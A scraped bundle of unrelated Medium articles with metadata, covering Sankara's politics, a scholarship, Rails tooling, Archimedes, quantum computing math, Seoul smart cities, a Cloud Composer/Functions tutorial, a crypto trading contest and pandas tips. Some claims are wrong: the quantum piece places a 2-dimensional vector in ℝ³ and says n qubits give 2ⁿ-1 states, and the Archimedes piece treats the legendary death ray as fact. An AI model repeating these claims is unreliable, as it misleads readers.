A second set of reasons for the rejection of class struggle, and thus of Marxist thought, results from a desire for cultural and epistemological independence. African-descended intellectuals have long addressed themselves to the psychic effects of post-Enlightenment thought’s negation of Black reason. Marxism’s historico-cultural specificity of 19th-century Europe has alienated many African thinkers who long for an authentically African sociological and political thought, which would owe everything to African minds and nothing to European ones. This, I think, has to do with a wounded pride and a tendency to idealize African societies before and during the Atlantic slave trade. In a lecture given in 1975 in New York, Walter Rodney takes Kwame Nkrumah as the paradigmatic figure of this tendency to avoid the reality of class struggle, qualifying that Ghana’s first president was not simply a bourgeois ideologue. From the 1950s to the end of his life, Nkrumah — a sincere and devoted revolutionary, statesman, and thinker — sought to develop an emancipatory consciousness while denying the importance of class contradictions in African societies. Chased from power by the CIA-allied Ghanaian petty bourgeoisie, whose non-existence as a class he had been busy theorizing, he finally produced a theoretical reflection which was at the same time an exercise in self-criticism while exiled in the Guinea of fellow anti-imperialist Sékou Touré.
With Thomas Sankara, who is of a different generation from that of Nkrumah and Senghor, there is no such ambiguity or escapism when it comes to dealing with class: the enemies of anti-imperialist struggle are the bourgeoisie and its allies, from the north and the south; its allies and prime beneficiaries, the working masses and, in a country like Burkina Faso, the peasantry most specifically.
When asked about the substance of his economic program, Sankara replied that it was for the Revolution to use the brains and arms of the Burkinabe, or people of Burkina Faso, to guarantee two meals a day and ten liters of water to all. One suspects that this goal, at once sublime and modest, did not excite the bourgeoisie. But the Burkinabè Revolution would achieve this aim over the course of four years, all the while being weaned off the budgetary assistance of France, the World Bank (which ceased immediately after the Revolution of 1983), and several other sources of financing promised to prior liberal regimes. Sankara’s sober class analysis is, in my opinion, one of the most valuable and unique aspects of his legacy for the African present. It is on the basis of this analysis that he was able to formulate and implement policies of redistribution.
Debt as a Hindrance to Sovereignty
When Sankara took power four years before his speech at the meeting of the Organization of African Unity, debt strangled not only the countries of Africa, but also those of Latin America. In 1985, out of a budget of 58 billion francs FCFA, Burkina Faso had to devote 12 billion to debt repayments. The speech of Thomas Sankara, as well as his call for a united front against debt, is in direct connection with the campaign launched by Fidel Castro in Havana in 1985. This campaign and his speech, which emphasized the odious nature of the debt, its colonial origins, its disastrous effects on public and social policies in particular, and the insolvency of debtors, does not, however, exhaust all the grievances Thomas Sankara harbored against the institution of debt.
Thomas Sankara was critical of both debt and aid, which was partly composed of loans. On the latter, he said: “We certainly encourage help that helps us to do without aid. But in general, the policy of assistance and aid has only disorganized us, enslaving us, disempowering us in our economic, political and cultural space.” This critique of aid is not simply made at the level of discourse; it is embedded in practical decisions. In 1987, he told one of his biographers, Ernest Harsch, that he suggested the United States replace the Peace Corps program in Burkina Faso with budgetary support. When the United States refused, Sankara promptly suspended the program. Sankara, although at the head of a very poor country and isolated by his ideological options, showed a rare strength of character and remarkable intransigence on the question of the sovereignty of his country. His speech at the UN in 1984 included this strong profession: “We swear, we proclaim, that from now on in Burkina Faso, nothing will happen without the participation of the Burkinabè. Nothing that wasn’t previously decided by us, elaborated by us. There will no longer be an attack on our decency and our dignity.”
This concern for autonomy, the preservation of the Revolution’s freedom of thought and action, had, as we have seen, the consequence of cutting Burkina Faso from several sources of financing. But Sankara was eager to act, to solve the hardships of his people, and to do so quickly. He therefore decided, without the need for IMF injunctions, severe austerity. He drastically cut the running costs of the administration, abolished the bonuses of civil servants, and reduced to a minimum the lifestyle of his government. What was saved from those budgetary cuts, was invested in education, health and agriculture programs in rural areas. To get an idea of the lengths to which this austerity went, let us remember that during his trip to New York at the UN, his delegation, which included ministers, was lodged on mattresses lying on the floor of Burkina Faso’s embassy. Official journeys and missions of State officials were only made in economy class.
Institutional and Cultural Failures of the Revolution
This austerity, a sort of ascetic policy, as well as the scale of the efforts required of the Burkinabè, but also a certain authoritarianism, had the consequence of displeasing or fatiguing even certain sections of the population who were rather favorable to the Revolution. Despite undeniable results from the point of view of health, food, and education, the Revolution in its last years alienated many Burkinabè, especially the most privileged ones. One should also note that although he was critical of parliamentarism and what he termed bourgeois democracy, Sankara failed to create a viable institutional alternative to it.
He also overestimated his fellow countrymen’s capacity for selflessness and revolutionary ardor. The Revolution created a series of institutions that were implemented in all regions of the country in order to replace feudal chieftaincies and channel people’s participation into the socio-economic development of the country but also to the judiciary system. Those were the electorally constituted CDR (Committees for the Defense of the Revolution) and the TPR (Popular Revolutionary Courts). Thought of as two-way communication channels between the people and the revolutionary leadership and as institutions of direct democracy, the CDR quickly became a vehicle for opportunistic elites. Because of the central authority’s lack of effective surveillance and coercive means, the CDR was found guilty of numerous power abuses and reactionary tendencies. One should also note that the speeches, radio and television shows, newspapers, and most of the vehicles of the régime’s communication relied on French, a language that the overwhelming majority of the people, those whose interests the Revolution was serving, did not understand. Vast segments of the peasantry, because of those cultural and institutional failures, were oblivious to the Revolution’s values, arguments for change and long term objectives.
A Lingering Thorn in Imperialism’s Side
On October 15, 1987, while Thomas Sankara was leading a work meeting in the Conseil de l’entente, shots rang out in the courtyard. According to the sole survivor of that meeting, Alouna Touré, Sankara asked those present to stay in the room and told them: “It is me that they are looking for.” He headed towards the door, lifting his hands as he exited the room. Armed men, commanded by Captain Gilbert Diendéré, a relative of Blaise Compaoré, fired on him without warning. The revolutionary process was tragically cut short. Compaoré, once a friend and ally, seized power and proceeded to a reinsertion of Burkina Faso in the domain of France. The country was once again on good terms with the World Bank and the IMF, as Blaise Compaoré slowly transformed it into a pillar of Françafrique.
When, in 2014, the Burkinabe youth, claiming the memory of Sankara, forced Compaoré to leave power, he was offered the direction of an international organization by President Hollande and eventually went into exile in Abidjan, Côte d’Ivoire. The court system and the people of Burkina Faso are today asking for his extradition so that he can be questioned in the investigation of the death of Thomas Sankara, the circumstances of which have not yet been fully investigated.
Thomas Sankara was 37 years old when he was assassinated, and his comrades, the group of people that led the revolution, were all in their 30s. 30 years have passed, and progressives on the continent and abroad still celebrate his memory every October 15th. He is one of the compasses that gives direction, one of the giants, on whose shoulders militants can climb to see farther and reach higher. When I think of the harsh conditions humankind is made to suffer in a country such as Upper Volta in the 1980s, I can’t help but to think of the flourishing of Thomas Sankara, the nurturing by his people of such a magnificent spirit, as an extremely eloquent testimony of universal human potential and resilience. | https://medium.com/refuse-to-cooperate/thomas-sankara-pan-africanist-and-marxist-revolutionary-20dcbef781ad | ['Kent Allen Halliburton'] | 2018-09-28 00:49:36.267000+00:00 | ['Politics', 'Communism', 'Africa', 'History', 'SEO'] |
Incoming SITA Student Awarded Prestigious Scholarship | Incoming SITA Student Awarded Prestigious Scholarship
and how you can too!
Min Kyo Jeong, 2016 Benjamin A. Gilman International Scholarship recipient
Looking for financial resources to support your semester abroad? We have a list of scholarships to start your search.
Bowdoin College Student Min Kyo Jeong awarded U.S. Department of State’s Benjamin A. Gilman International Scholarship to study abroad.
July 15, 2016 — Min Kyo (Michelle) Jeong, a sociology student at Bowdoin College is one of over 850 American undergraduate students from 324 colleges and universities across the U.S. selected to receive the prestigious Benjamin A. Gilman International Scholarship, sponsored by the U.S. Department of State’s Bureau of Educational and Cultural Affairs to study or intern abroad during the fall 2015/academic year 2015–2016 academic term. Michelle will study abroad in Madurai, India with South India Term Abroad.
Gilman scholars receive up to $5,000 to apply towards their study abroad or internship program costs. The program aims to diversify the students who study and intern abroad and the countries and regions where they go. Students receiving a Federal Pell Grant from two- and four-year institutions who will be studying abroad or participating in a career-oriented international internship for academic credit are eligible to apply. Scholarship recipients have the opportunity to gain a better understanding of other cultures, countries, languages, and economies — making them better prepared to assume leadership roles within government and the private sector.
Congressman Gilman, who retired in 2002 after serving in the House of Representatives for 30 years and chairing the House Foreign Relations Committee, commented, “Study abroad is a special experience for every student who participates. Living and learning in a vastly different environment of another nation not only exposes our students to alternate views, but also adds an enriching social and cultural experience. It also provides our students with the opportunity to return home with a deeper understanding of their place in the world, encouraging them to be a contributor, rather than a spectator in the international community.”
The program is administered by the Institute of International Education (IIE). The full list of students who have been selected to receive Gilman Scholarships, including students’ home state, university and host country, is available on their website: www.iie.org/gilman. According to Allan Goodman, President and CEO of IIE, “International education is one of the best tools for developing mutual understanding and building connections between people from different countries. It is critical to the success of American diplomacy and business, and the lasting ties that Americans make during their international studies are important to our country in times of conflict as well as times of peace.”
* * * * * * * *
The U.S. Department of State, Bureau of Educational and Cultural Affairs’ (ECA) mission is to increase mutual understanding between the people of the United States and the people of other countries by means of educational and cultural exchange that assist in the development of peaceful relations. In an effort to reflect the diversity of the United States and global society, ECA programs, funding, and other activities encourage the involvement of American and international participants from traditionally underrepresented groups, including women, racial and ethnic minorities, and people with disabilities. Artists, educators, athletes, students, youth and rising leaders in the United States and more than 160 countries around the globe participate in academic, cultural, sports, and professional exchanges. For more information about ECA programs, initiatives, and achievements, visit http://eca.state.gov.
The Institute of International Education (IIE) is the world leader in the international exchange of people and ideas. An independent, nonprofit organization founded in 1919, the Institute is the world’s most experienced global higher education and professional exchange organization. IIE has a network of 19 offices worldwide working with more than 1,200 member institutions and over 6,000 individuals with a commitment to the internationalization of their institutions. IIE designs and implements programs of study and training for students, educators, young professionals and trainees from all sectors with funding from government and private sources. These programs include the Fulbright and Humphrey Fellowships administered for the U.S. Department of State. The Institute is a resource for educators and institutions worldwide (http://www.iie.org), publishing the Open Doors Report and operating www.IIEPassport.org and www.studyabroadfunding.org search engines for study abroad program and study abroad scholarships. For more information, please contact Lindsay Calvert, Director, Gilman International Scholarship, at 832–369–3481 or lcalvert@iie.org.
Follow SITA on Instagram, Facebook, Twitter, and YouTube. Learn more and apply at sitaprogram.org. | https://medium.com/sita-blog/study-abroad-scholarship-resources-cb0c2657760f | ['South India Term Abroad'] | 2016-08-08 19:34:47.739000+00:00 | ['India', 'Funding', 'Study Abroad', 'Education', 'Scholarship'] |
VS Code Extensions for Ruby on Rails Developers | Ruby
This speaks for itself. Ruby syntax highlighting.
Intelligent code completion and documentation while you’re writing code.
Be wise and never forget to close the end immediately.
Useful shortcuts to save you time.
Get quick insight on the defined database schema while you’re typing.
Code formatter for writing Ruby.
If you’re running into the following error, follow this guide to link the right execution path:
rubocop is not excutable
execute path is empty!
Not being able to indent your html.erb files in VS Code can be a real pain. ERB Formatter depends on the htmlbeautifier gem, so we need to install that dependency too.
gem install htmlbeautifier
8. Emmet in ERB | https://medium.com/better-programming/vs-code-extensions-for-ruby-on-rails-developers-917474e03e04 | ['Thomas Van Holder'] | 2020-09-09 15:28:14.456000+00:00 | ['Vscode', 'Ruby on Rails', 'Software Development', 'Ruby', 'Programming'] |
The Brilliant Scientist Who Stopped the Roman Army | The story of Archimedes
Archimedes was the resident of the city-state of Syracuse on the east coast of Sicily, founded in 734 BCE. During his time the state was a powerhouse of art, science, and commerce even rivaling Athens.
Archimedes shared a close relationship with the king and was often called to suggest solutions to civic problems within the city. From inventing a water pump to remove rainwater from ships to testing the amount of gold in the king’s crown (remember the Eureka moment when he ran naked?), Archimedes’s brilliance made him the most respected scientist of his time.
It was around this time that the Romans attacked the state. A huge Roman army under their famous general Marcellus laid siege outside the walls of Syracuse. Well versed in siege warfare, the Romans expected the conquering of the city-state to be a cakewalk as ships carrying ladders and grappling hooks sailed toward the city with the intention of scaling its walls.
But they had grossly underestimated the brilliance of Archimedes. Archimedes devised a series of devious engineering marvels that repulsed Marcellus and his army in every assault. What was expected to finish in two days went on for two years with the Roman army waiting outside the walls, frustrated and terrorized by a ‘local’ engineer as they called Archimedes.
Some of his marvelous creations were simply too brilliant even for today’s times.
The Archimedes Claw
The Archimedes Claw was a notorious invention in which huge beams could be swung out over the walls and some of also dropped huge weights, punching holes through the ships and sinking them.
Others had a claw or grappling hook, which grabbed hold of the rigging or rails of a galley, raising it, shaking it, and capsizing it. The terrifying spectacle of a ship being lifted and thrown stuck terror within the Romans.
The Archimedes Catapult Engine
The historian Plutarch describes the catapult engine as a series of “engines” designed to hurl arrows and rocks at attacking Roman troops and ships.
According to him, some of the rocks hurled from Archimedes’s catapults weighed as much as 10 talents — around 700 pounds. He also describes different types of catapult engines with varied ability to hurl or shoot projectiles at attackers both at great range and directly under the city’s walls.
The Archimedes Death Ray
This was the most lethal of Archimedes inventions. The invention involved a huge mirror that could focus sunlight onto the wooden Roman ships and cause them to burst into flames.
The device consisted of a large array of highly polished bronze or copper shields arranged in a parabola, concentrating sunlight into a single, intense beam. This single device spread havoc among Roman sailors who even mutinied rather than getting burnt to death.
Marcellus could not afford any more direct attacks and he suffered heavy losses. What began as a short siege had become a stalemate that went on for two years. | https://medium.com/lessons-from-history/the-brilliant-scientist-who-stopped-the-roman-army-f85f295063c3 | ['Mythili The Dreamer'] | 2020-11-06 19:35:45.848000+00:00 | ['World', 'Culture', 'Technology', 'Science', 'History'] |
Collapsing the Superposition: The Mathematics of Quantum Computing | We think of bits as 1’s and 0’s. Really, bits could be anything with 2 states: true/false; on/off; heads/tails. A classical computer simply quantifies these bits as integers since that’s all a computer can store and process. Qubits, however, are an entirely different beast: they’re vectors. This is because a qubit really represents the probability that its bitstate is either 0 or 1; rather than only being 0 or 1, they can exist as any value between 0 and 1 until they are measured (we’ll touch on this in a bit).
In quantum mechanics, we represent vectors using Dirac notation, which makes quantum computations clearer and more concise. |ψ⟩ denotes a unit column vector and ⟨ψ| denotes a corresponding row vector. ⟨ψ| is the Hermitian transpose of |ψ⟩, which is found be transposing |ψ⟩ and taking the complex conjugate of every entry, represented as ψ†. We represent the classical bits 0 and 1 as column vectors |0⟩ and |1⟩:
Notice how the 1 is in the 0th position for |0⟩ and in the 1st position for |1⟩
Why are qubits vectors? In quantum mechanics, the properties of electrons, more precisely its spin, are unknown until we actually measure its state. Similarly, in quantum computing, the state of a qubit exists as a superposition of all possible states, with an assigned probability of it being 0 or 1; until the qubit is measured (see below), it is both 0 and 1, but with a certain likelihood of collapsing to 0 versus 1. A qubit in a state of superposition is a linear combination of the infinite states that exist between 0 and 1. This can be visualized on a Bloch sphere.
The Bloch sphere enables us to visualize the qubit, which is a 2-dimensional complex vector as a 3-dimensional real-valued vector.
So, when we perform specific operations upon a qubit, we can force it into a superposition, where it is no longer only 0 or only 1; rather, it exists as a certain probability of both. These operations can be thought of as rotating the unit vector around the Bloch sphere in a 3-dimensional real vector space. A vector space is simple the space in which a vector resides in. A simple 2-dimensional vector lies in the vector space ℝ³.
When a qubit is actually measured, it will always be either 0 or 1. The act of measuring the qubit has caused the quantum superposition to collapse, and the qubit’s state is now analogous to classical bits’. Informally, we can consider measuring a qubit as ‘observing’ it. Once a qubit’s superposition has been collapsed, it will remain in that state indefinitely. The value it collapses to depends upon its configuration, which is known as its quantum interference. A qubit can be restored to a superposition state via a quantum gate, which performs an operation upon one or more qubits.
More generally, a qubit’s state can be represented as |ψ⟩ = α|0⟩ + β|1⟩, where α and β are complex numbers (numbers of the form a + bi) denoting the respective probability that the qubit will collapse to either 0 or 1. These coefficients satisfy the equation|α|²+|β|² = 1, as the sum of all probabilities in a system must be 1. Thus, if the qubit has a 50% chance of collapsing to 0 and a 50% of chance of collapsing to 1, α =1/√2 and β=1/√2.
As seen in the Bloch sphere, |0⟩ and |1⟩ form the basis vectors of the vector space that describes the qubit’s state. α and β can thus be seen as the rotations applied to a vector in a complex vector space. We often arrange α and β in a column vector known as a quantum states vector as shown below:
A single qubit isn’t of much practical use, with a modern calculator subjugating it. The true power of quantum computing is with using and manipulating many qubits. Multiple qubits of a single quantum state are denoted as a tensor product. If we let α|0⟩ + β|1⟩ and γ|0⟩ + δ|1⟩ be two qubits’ states, then we can represent their system’s state as follows:
What every element of this column vector represents is the probability that the quantum system will collapse to a value of 0, 1, 2, or 3. In general, if we have n qubits we can represent 2ⁿ-1 states. While we can always take the tensor product of 2 single-qubit states, not all two-qubit states can be denoted as a tensor product. In fact, such a system is said to be entangled. | https://medium.com/datadriveninvestor/collapsing-the-superposition-the-mathematics-of-quantum-computing-6c4679c6cf99 | ['Kaushik Chatterjee'] | 2020-10-31 08:00:16.012000+00:00 | ['Quantum Physics', 'Mathematics', 'Technology', 'Linear Algebra', 'Quantum Computing'] |
Building Smart Cities from Big Data | Building Smart Cities from Big Data
Since the introduction of smartphones, the term “smart” has been added in front of just about anything that connects to the internet, from smart home appliances to smart cars, and now smart cities. Rachel Yoon Follow Apr 23, 2020 · 5 min read
Despite hearing this term for a decade now, many of us are still confused about what it really means.
The core element that constitutes “smart” is not internet connection, but data sharing and analysis. A smart device goes beyond generating and collecting data, but also takes part in sharing and analyzing data into useful information. Such information would then be used for maximizing efficiency and eliminating deficiencies.
For example, a smart speaker utilizes a massive database of speech patterns and learns those patterns in order to provide the optimal response to the user’s request. A smart car utilizes a database of traffic patterns and combines them with real-time transportation data to provide a smooth transportation experience.
What are smart cities?
Just like other smart things, a smart city can be seen as a giant smart device that shares data through information and communication technologies (ICTs) and analyzes them to gain useful insights. In more specific terms, a smart city collects data through various Internet of Things (IoT) sensors and uses these data to generate useful information to optimize the functioning of the city.
Simply put, the two ultimate goals for a smart city is to drive sustainability by saving resources and to improve livability by optimizing city functions.
How to build a smart city?
Governments of major metropolitan centers across the globe have started their own initiatives towards building a smart city. Smart city projects have already been implemented in cities like Madrid, Amsterdam, Dubai, Singapore, Seoul, and New York.
In South Korea, a market where Penta Security is highly involved in, smart city programs have started to take off. Its capital city Seoul is planning and implementing some of the most ambitious smart city projects. Last year, the metropolitan government of Seoul announced its plan to invest a total of 1.4 trillion won, or roughly 1.15 billion US dollars, on smart city projects.
In order to better understand how a smart city is built, let’s take a look at what Seoul has been working on.
Smart environment
Seoul is currently installing 50,000 IoT sensors within the city to collect environmental data including air and noise pollution, UV rays, and population density. Residents can look for this information in real-time to plan their daily activities. The city also collects data on road surface temperature to determine where to install heating cables.
Smart services
Before building new public services, the government analyzes population data to gain insights on where a service is most needed so that every service can be built with the optimal capacity at the optimal location. This is especially useful for building welfare infrastructures such as public health facilities and daycare centers.
During the development process, the city also utilizes 3D simulation to see how new facilities fit with the surrounding community, ensuring they are both practical and aesthetically pleasing.
Smart mobility
We cannot talk about smart mobility without mentioning autonomous driving. Seoul has completed the world’s first 5G autonomous driving testbed at Digital Media City, preparing itself for a fully connected mobility environment.
The city has also built a shared parking lot system equipped with IoT sensors. Residents can use a mobile app to gain real-time information on parking space availability, make reservations, and make payments. More than 500 public parking lots are currently enrolled, with the number expected to reach 3,000 by 2022.
In terms of public transportation, the city has rolled out a series of night-time bus routes. During the planning process, data of three billion mobile phone calls with their time and location were analyzed in order to identify the locations with the highest demand. Currently used by 10,000 people daily, the new routes turned out to be highly efficient.
Smart policing
Intelligent surveillance cameras are used in public spaces, automatically analyzing real-time footage to detect abnormal activities such as fights, arson attacks, and traffic accidents. Street lights are equipped with sensors that automatically light up when pedestrians pass by so that no dark spot is left open at night, saving energy while enhancing safety.
Smart healthcare
Seoul is also actively involved in the healthcare industry to provide smart care services for seniors. It is currently working with public healthcare facilities to securely retrieve medical data, which it uses to identify physically vulnerable individuals. It will then help ensure the safety of these individuals by monitoring their electricity and water usage in real-time. If no change in usage is detected, an alarm will be sent immediately to a social worker in charge. This service has already been implemented for 1,000 vulnerable households and is expected to reach 4,000 households by 2022.
Security infrastructure for smart cities
Building a smart city based on big data comes with its security risks. Integrating every IoT element into one massive network means that many critical functions of the city would be bound together, which also means that cyberattackers have more entry points to choose from.
Without proper security measures, smart cities can quickly turn into chaos. As we have always emphasized, the more we rely on technology and automation, the more blurry the boundary between the real world and the cyberworld. In the case of smart cities, cybersecurity is directly tied to physical safety. Criminals could attack major infrastructures to disrupt service, and take advantage of such disruptions to conduct illegal activities. Service disruptions on public transportation, electricity, and healthcare pose a significant threat to our economy and society. We have seen recent cyberattacks on healthcare providers, some of them causing critical surgeries to be delayed (ZDNet). Another severe case would be an attack on autonomous vehicles, which indeed has life-threatening consequences.
Apart from safety, privacy is another concern. A smart city shares tons of data with millions of devices. Some of these data could contain personally identifiable information, which must be encrypted and secured with blockchain technology. Surveillance footage is also concerning for many who worry about exposing their daily activities.
Penta Security’s role in building smart cities
With abundant experience in designing public key infrastructures (PKIs) for governments as well as security solutions for financial institutions, Penta Security is actively involved as a security infrastructure provider for smart cities. Working with government ministries and infrastructure providers, Penta Security has been playing a key role in securing a wide range of smart infrastructure projects in the fields of mobility, transportation, energy, and environment.
As these smart infrastructures become increasingly connected, forming a massive network, Penta Security is currently focusing on developing an integrated solution for smart cities.
Source: Seoul Metropolitan Government
Check out Penta Security’s product lines:
Web Application Firewall: WAPPLES
Web Application Firewall for Cloud: WAPPLES SA
Database Encryption: D’Amo
Authentication: ISign+
Smart Car Security: AutoCrypt | https://medium.com/penta-security-systems/building-smart-cities-from-big-data-f34942fac5d4 | ['Rachel Yoon'] | 2020-04-23 05:37:53.027000+00:00 | ['Smart City Solutions', 'Infrastructure', 'Smart City', 'Big Data Analytics', 'Big Data'] |
Calling Cloud Composer to Cloud Functions and back again, securely | Sample Cloud Composer (Apache Airflow) configuration to securely invoke Cloud Functions or Cloud Run.
In addition this sample shows inverse: how Cloud Functions can invoke a Composer DAG securely. While GCF->Composer is documented here, the configuration detailed here is minimal and (to me), easier to read.
Setup
1. Create Composer Environment
export GOOGLE_PROJECT_ID=`gcloud config get-value core/project`
export PROJECT_NUMBER=`gcloud projects describe $GOOGLE_PROJECT_ID --format='value(projectNumber)'` gcloud composer environments create composer1 --location us-central1 gcloud composer environments list --locations us-central1
┌───────────┬─────────────┬─────────┬──────────────────────────┐
│ NAME │ LOCATION │ STATE │ CREATE_TIME │
├───────────┼─────────────┼─────────┼──────────────────────────┤
│ composer1 │ us-central1 │ RUNNING │ 2019-05-21T20:35:21.960Z │
└───────────┴─────────────┴─────────┴──────────────────────────┘
2. Add Python Packages and GCF Connection URL
The following steps sets up Airflow connections we will use internally. The commands below describes a URL to a GCF function we will enable later.
Configure requirements.txt
gcloud composer environments update composer1 \
--update-pypi-packages-from-file requirements.txt --location us-central1
Configure connection
gcloud composer environments update composer1 \
--update-env-variables=AIRFLOW_CONN_MY_GCF_CONN=https://us-central1-$GOOGLE_PROJECT_ID.cloudfunctions.net --location us-central1
Note: each of these commands takes ~10mins; go grab a coffee.
Verify configurations via cli and on the Cloud Console for Composer
gcloud composer environments describe composer1 --location us-central1
The following will list the default GCS bucket used for its configurations and DAG storage
gcloud composer environments describe composer1 --location us-central1 --format="get(config.dagGcsPrefix)"
You can now open up the Airflow GUI
and also see the GCP Console:
Config:
Env
Python Packages
3. Identify the client_id used by IAP
Cloud Composer is shielded by Cloud Identity Aware proxy. The following command will identify the oauth2 client_id it uses which we will later need to trigger DAGs externally from GCF. For refrerence, see triggering with gcf
Get ariflow URL:
If you are an Editor on the project running Airflow, you should have Editor rights to invoke the endpoint:
(the follwing command uses jq cli to parse JSON)
$ curl -s -H "Authorization: Bearer `gcloud auth print-access-token`" https://composer.googleapis.com/v1beta1/projects/$GOOGLE_PROJECT_ID/locations/us-central1/environments/composer1 | jq [.config.airflowUri]
In my case, the URL for Airflow is:
[
"https://r1d366b885bb81b73-tp.appspot.com"
]
Use the URL to extract the client ID
Attempt to make an unauthenticated call to the URL. You should see an error but within the curl output you will find the elusive client_id :
eg, in my case the command above showed
which means the client_id is 491562778408-sj8hb4035bp7ui918ra0i9qbhbqnejk1.apps.googleusercontent.com
Note the client_id and composer_url:
target_audience = `491562778408-sj8hb4035bp7ui918ra0i9qbhbqnejk1.apps.googleusercontent.com` url = `https://r1d366b885bb81b73-tp.appspot.com`
4. Deploy DAGs
Deploy the DAG that sends authenticated calls to GCF:
Edit to_gcf.py and replace the following line with your projectID
target_audience = 'https://us-central1-$GOOGLE_PROJECT_ID.cloudfunctions.net/echo_app_python'
then
gcloud composer environments storage dags import \
--environment composer1 --location us-central1 \
--source to_gcf.py
Deploy the DAG that receives authenticated calls from GCF:
gcloud composer environments storage dags import \
--environment composer1 --location us-central1 \
--source from_gcf.py
5. Deploy GCF
Edit main.py and update target_url and url with the values from step 3:
in my case:
target_audience = '491562778408-sj8hb4035bp7ui918ra0i9qbhbqnejk1.apps.googleusercontent.com'
url = 'https://r1d366b885bb81b73-tp.appspot.com'
then deploy
gcloud functions deploy echo_app_python --region=us-central1
6. Set IAM Permissions
Now set IAM permissions to
Allow Composer to call GCF
When we setup composer, we did not specify the serivce account it should run as. By default, it will use the compute engine service account which is in the form:
$PROJECT_NUMBER-@developer.gserviceaccount.com
the apply:
gcloud alpha functions add-iam-policy-binding echo_app_python \
--member serviceAccount:$PROJECT_NUMBER-compute@developer.gserviceaccount.com \
--role roles/cloudfunctions.invoker
Allow GCF to call Composer
During our setup of Cloud Functions, we did not specify a service account. By default GCF will use an account in the form:
$GOOGLE_PROJECT_ID@appspot.gserviceaccount.com
so using that, go to the Cloud Consoles IAM page and for that account, add the Composer User IAM role
GCF invokes a DAG directly using the Experimental Rest Endpoint
7. Invoke DAG directly
The default DAG callgcf DAG is set to run every 30minutes. However, you can invoke it directly if you want via the UI or CLI:
On the console, you should see invocation back and forth:
callgcf :
fromgcf :
References | https://medium.com/google-cloud/calling-cloud-composer-to-cloud-functions-and-back-again-securely-8e65d783acce | ['Salmaan Rashid'] | 2020-01-01 16:25:57.842000+00:00 | ['Airflow', 'Google Cloud Platform'] |
CVI Beta Platform Competition — The Results! | On December 30th we launched the beta version of the CVI trading platform. In order to encourage users to test the platform before it goes live on MainNet and to educate our community on Volatility Trading, we performed an incentivized trading competition on the CVI platform.
The competition started on December 30th, 2020, at 4 pm UTC and ended on January 17th, 2021, at 8 am UTC. At this time exactly, we ran the snapshot of all participants’ P&L (profits and losses).
This competition was a great success and allowed 1700 users to familiarize themselves with the platform. These users participated and competed to get a share of the reward pool of 150K $GOVI. Not only were they awarded for their participation, but it also allowed us to have valuable insights and form new, interesting ideas. Some of them will be implemented in the MainNet version, and for that, we’d like to thank all the participants who took part in this beta testing.
Here are some key insights into what happened on the platform during the entire duration of the competition:
Participation
More than 1700 users participated in the competition and tested the system.
15,160,621$ test USDT were locked into the platform of which: 6,915,572$ were deposited in liquidity and 8,245,048$ were the current trading positions.
During the competition time, the CVI rose to an all-time high of 156.5.
Stats
Buyers of CVI (LONG CVI):
1296 users of the platform have chosen to buy positions, expecting more market volatility.
The buyers’ positions size was: 8.24M USDT
As it turns out, those users were correct in their predictions, some making a profit of over 78% during the 17 days of the competition.
The collateral ratio, which is the ratio between the amount of all the buyers’ positions and the total liquidity available, was at 72.6% on January 17th. This is just below the threshold, so the buying premium fee was zero.
Depositing Liquidity (SHORT CVI): | https://medium.com/@cviofficial/cvi-beta-platform-competition-the-results-ceedd2d1deb3 | [] | 2021-01-18 14:50:29.334000+00:00 | ['Competition', 'Blockchain', 'Cryptocurrency', 'Trading'] |
Your Ultimate Data Manipulation & Cleaning Cheat Sheet | X-Variable Cleaning Methods
Applying a function to a column is often needed to clean it. In the case where cleaning cannot be done by a built-in function, you may need to write your own function or pass in an external built-in function. For example, say that all values of column b below 2 are invalid. A function to be applied can then act as a filter, returning NaN values for column elements that fail to pass the filter:
def filter_b(value):
if value < 2:
return np.nan
else:
return value
A new cleaned column, ‘cleaned_b’, can then be created by applying the filter using pandas’ .apply() function:
data['cleaned_b'] = data['b'].apply(filter_b)
Another common use case is converting data types. For instance, converting a string column into a numerical column could be done with data[‘target’].apply(float) using the Python built-in function float .
Removing duplicates is a common task in data cleaning. This can be done with data.drop_duplicates() , which removes rows that have the exact same values. Be cautious when using this — when the number of features is small, duplicate rows may not be errors in data collection. However, with large datasets and mostly continuous variables, the chance that duplicates are not errors is small.
Sampling data points is common when a dataset is too large (or for another purpose) and data points need to be randomly sampled. This can be done with data.sample(number_of_samples) .
Renaming columns is done with .rename , where the parameter passed is a dictionary where the key is the original column name and the value is the renamed value. For example, data.rename({‘a’:1, ‘b’:3}) would rename the column ‘a’ to 1 and the column ‘b’ to 3.
Replacing values within the data can be done with data.replace() , which takes in two parameters to_replace and value , which represent values within the DataFrame that will be replaced by other values. This is helpful for the next section, imputing missing values, which can replace certain variables with np.nan so imputing algorithms can recognize them.
More handy pandas functions specifically for data manipulation can be found here: | https://towardsdatascience.com/your-ultimate-data-manipulation-cleaning-cheat-sheet-731f3b14a0be | ['Andre Ye'] | 2020-07-04 16:55:44.812000+00:00 | ['Machine Learning', 'Data Analysis', 'AI', 'Data Science', 'Statistics'] |
Today I went to this tea shop after a long time. | Today I went to this tea shop after a long time. Everything was the same as before except for two things (bolded below).
I walked towards the tea shop. I reached there, he recognized me and smiled. I too smiled. I ordered the tea. He served the tea, but this time in a paper cup.
Before he used to serve tea on a glass cup, but now due to covid spread he is serving tea in a disposable paper cup.
I took the paper cup filled with tea and immediately began to sip it, only to recognize that this time I got a mask on my face, covering my mouth, which I had to take off before I make fun of myself.
I sat there and finished the tea, paid the money, and came back walking. Is it not good enough? | https://medium.com/everything-shortform/today-i-went-to-this-tea-shop-after-a-long-time-d305e35136d | ['Pretheesh Presannan'] | 2020-12-17 05:05:40.822000+00:00 | ['Fun', 'Short Read', 'Pandemic', 'Tea', 'Masks'] |
SentencePiece Tokenizer Demystified | SentencePiece Tokenizer Demystified
An in depth dive into the inner workings of the SentencePiece tokenizer, why it’s so powerful, and why it should be your go to tokenizer. You might just start caring about tokenization. Jonathan Kernes Feb 4·18 min read
Photo by Cristian Escobar on Unsplash
I’ll be the first to admit that learning about tokenization schemes can be boring, if not downright painful. Often, when training a natural language, choosing and implementing a tokenization scheme is just one more added layer of complexity. It can complicate your production pipelines, kill the mood with a poorly timed [OOV] or [UNK], or maybe just send you into the depths of unicode hell, where you wonder why “string” != “string”.
However, like your first truly good glass of wine, or your first experience with high quality sushi, once you’ve had a taste of the good stuff, you’ll see the rest in a totally different light. This post is meant to discuss SentencePiece, and show how painless it makes the tokenization process. Along the way you might just decide that tokenization isn’t so bad after all.
What is SentencePiece?
